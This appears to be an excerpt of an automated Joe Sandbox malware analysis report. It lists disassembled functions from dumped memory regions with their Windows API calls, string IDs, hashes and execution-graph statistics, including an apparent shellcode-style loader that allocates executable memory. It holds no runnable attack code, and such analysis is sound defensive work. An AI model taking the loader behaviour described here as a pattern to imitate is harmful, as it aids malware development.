                                                    • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Enter$Leave
                                                    • String ID:
                                                    • API String ID: 2801635615-0
                                                    • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                    • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                    • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                    • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                    • Instruction ID: aeedd7f564a67e57ed220c44ddd5d93f99ac5cac7320b008971b35ef9a4a2694
                                                    • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                    • Instruction Fuzzy Hash: 1ED10232F0AA8989E710CF75E4602ED37B1FB46B98B044276DE5D97B9ADE38D406C344
                                                    APIs
                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDA580ED07), ref: 00007FFDA580EE38
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDA580ED07), ref: 00007FFDA580EEC3
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                    • Instruction ID: a6251fa9b2e0559b842ce224f064285f7dbf61aabd1d36480ded7b550a35f446
                                                    • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                    • Instruction Fuzzy Hash: AD91B522B1B65985F7608F75A4A037E6BA0BF06F88F1442B9DE4E56786DF38D442C708
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                    • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                    • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalEventSection$EnterLeaveReset
                                                    • String ID:
                                                    • API String ID: 3553466030-0
                                                    • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                    • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                    • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                    • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalEventSection$EnterLeaveReset
                                                    • String ID:
                                                    • API String ID: 3553466030-0
                                                    • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                    • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                    • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                    • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                    • Instruction ID: f732216ccb459cebfc6c5c483dea583d6165ef4f5f0db10682e56939b99ffe5e
                                                    • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                    • Instruction Fuzzy Hash: CC114C22B16B058AEB00CB71E8643A833A4FB1AB58F440A71EA2E467A9DF78D154C340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CreateEvent$CriticalInitializeSection
                                                    • String ID:
                                                    • API String ID: 926662266-0
                                                    • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                    • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                    • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                    • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: __except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 1467352782-3733052814
                                                    • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                    • Instruction ID: 5ef3f8c4a8fd4e4fd0b2032b195f7717601e06d5e3bdfba1db7d7f91433890e4
                                                    • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                    • Instruction Fuzzy Hash: 6A71A13270A68986D7608B35946477D7BA0FF16F84F148276EECC07B8ACB2CE451C748
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CreateFrameInfo__except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 2558813199-1018135373
                                                    • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                    • Instruction ID: 166c4002f63560a9acfaca314f68b28f34e50455987cbd9472f8afa8990448e2
                                                    • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                    • Instruction Fuzzy Hash: 5A514F3271AB4596D660AF26E05036D77A4FF8AF90F100274EB8D07B56CF38E461CB04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                    • Instruction ID: 4a8bd31637707edcde8d3a40ab9d16c1835626c0481f0ffbffb370d3ab505f83
                                                    • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                    • Instruction Fuzzy Hash: B341C332B1AA4582EB20DF35F8643AA67A0FB89B94F404131EE4E87799DF3CD445CB44
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID: csm
                                                    • API String ID: 3997070919-1018135373
                                                    • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                    • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                    • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                    • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                    APIs
                                                      • Part of subcall function 00007FFDA5803A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA5803A63
                                                    • __GSHandlerCheckCommon.LIBCMT ref: 00007FFDA5810993
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CheckCommonHandler__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 1543384424-629598281
                                                    • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                    • Instruction ID: 53be86f5b2d531bba98e05169c4d62ac75cc138df86f4676f38e93a998b29913
                                                    • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                    • Instruction Fuzzy Hash: 3011E432B19789C6E7109F32A4612696764FF46FC0F088175EE880BB87CE38D991C704
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: TimerWaitable
                                                    • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                    • API String ID: 1823812067-484248852
                                                    • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                    • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                    • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                    • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                    APIs
                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDA580112F), ref: 00007FFDA58039E0
                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDA580112F), ref: 00007FFDA5803A21
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                    • Instruction ID: 2f74dbc9bcd65b0479c6d0e8f719c8c045e467d259546e43a767c94aecd621f4
                                                    • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                    • Instruction Fuzzy Hash: F4115832619B8582EB208B25F41036AB7E4FB8AF84F584270EE8D07B59DF3CD651CB04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: TimerWaitable
                                                    • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                    • API String ID: 1823812067-3336177065
                                                    • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                    • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                    • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                    • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                    • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                    • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                    • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 027001DF
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000003.3258698659.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_3_2700000_qNHTRl.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                    • Instruction ID: 99f3ecd34e9d9fbbd352a92cc051f55fc7f12eb9ed1f4e0aa011050184b68992
                                                    • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                    • Instruction Fuzzy Hash: D6A13770A00606EFDB15CFA9C8C0BAEB7F5FF49328B148069E415EB291D770EA55CB90
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0270048B
                                                    • VirtualFree.KERNELBASE(?,?,00004000), ref: 027004F1
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000003.3258698659.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_3_2700000_qNHTRl.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID:
                                                    • API String ID: 2087232378-0
                                                    • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                    • Instruction ID: 2cb909c21f2b66a1aaa5c62b4441e7cf7967d539b6835f3fb9c70d89b8034aa4
                                                    • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                    • Instruction Fuzzy Hash: DE21F675A00205EBCB209BA48CC5FAFB7F9EF05324F104428FA0AB22C1D731A9099664
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000003.3258698659.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_3_2700000_qNHTRl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: l$ntdl
                                                    • API String ID: 0-924918826
                                                    • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                    • Instruction ID: c37d3dc9da464fc0dee2808e90dafb47c7d238628ba1f4f5b83be04f12a06d80
                                                    • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                    • Instruction Fuzzy Hash: 3C115EB5701A01EFCB16AF18C848A0EBBF6FF88760B218159E105D7750EB359A258FD5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000003.3258698659.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_3_2700000_qNHTRl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: l$ntdl
                                                    • API String ID: 0-924918826
                                                    • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                    • Instruction ID: a09a0097b3a8893e6ec36bf1998d90c9b16db5805ca73358a6abf7b4861e50c9
                                                    • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                    • Instruction Fuzzy Hash: 4E018871700114AFCB05DF99C845EAEFBFAEF84764F0440A9F904A7350DA70DE048BA1

                                                    Execution Graph

                                                    Execution Coverage:5.9%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:1.3%
                                                    Total number of Nodes:1047
                                                    Total number of Limit Nodes:29
                                                    execution_graph 4386 fa5138 4387 fa514a 4386->4387 4389 fa5158 @_EH4_CallFilterFunc@8 4386->4389 4388 fa10cc ___ansicp 5 API calls 4387->4388 4388->4389 3892 fa28fe 3893 fa2901 3892->3893 3896 fa51fb 3893->3896 3897 fa521a 3896->3897 3898 fa5221 3896->3898 3899 fa1719 __NMSG_WRITE 66 API calls 3897->3899 3908 fa2f92 3898->3908 3899->3898 3903 fa530a 3932 fa1697 3903->3932 3904 fa5232 __crtGetStringTypeA_stat 3904->3903 3906 fa52ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3904->3906 3906->3903 3909 fa20f9 __decode_pointer 6 API calls 3908->3909 3910 fa2f9d 3909->3910 3910->3904 3911 fa2f9f 3910->3911 3914 fa2fab _doexit 3911->3914 3912 fa3007 3913 fa2fe8 3912->3913 3917 fa3016 3912->3917 3918 fa20f9 __decode_pointer 6 API calls 3913->3918 3914->3912 3914->3913 3915 fa2fd2 3914->3915 3920 fa2fce 3914->3920 3916 fa22cc __getptd_noexit 66 API calls 3915->3916 3922 fa2fd7 _siglookup 3916->3922 3919 fa2c72 _strcat_s 66 API calls 3917->3919 3918->3922 3921 fa301b 3919->3921 3920->3915 3920->3917 3923 fa2c0a _strcat_s 6 API calls 3921->3923 3924 fa307d 3922->3924 3925 fa1697 _raise 66 API calls 3922->3925 3931 fa2fe0 _doexit 3922->3931 3923->3931 3926 fa2aa0 __lock 66 API calls 3924->3926 3927 fa3088 3924->3927 3925->3924 3926->3927 3928 fa20f0 ___crtMessageBoxW 6 API calls 3927->3928 3929 fa30bd 3927->3929 3928->3929 3935 fa3113 3929->3935 3931->3904 3933 fa1555 _doexit 66 API calls 3932->3933 3934 fa16a8 3933->3934 3936 fa3119 3935->3936 3937 fa3120 3935->3937 3939 fa29c6 LeaveCriticalSection 3936->3939 3937->3931 3939->3937 3944 fa235f 3945 fa236b _doexit 3944->3945 3946 fa2383 3945->3946 3948 fa35ee ___free_lc_time 66 API calls 3945->3948 3977 fa246d _doexit 3945->3977 3947 fa2391 3946->3947 3949 fa35ee ___free_lc_time 66 API calls 3946->3949 3950 fa239f 3947->3950 3951 fa35ee ___free_lc_time 66 API calls 3947->3951 3948->3946 3949->3947 3952 fa23ad 3950->3952 3953 fa35ee ___free_lc_time 66 API calls 3950->3953 3951->3950 3954 fa23bb 3952->3954 3956 fa35ee ___free_lc_time 66 API calls 3952->3956 3953->3952 3955 fa23c9 3954->3955 3957 fa35ee ___free_lc_time 66 API calls 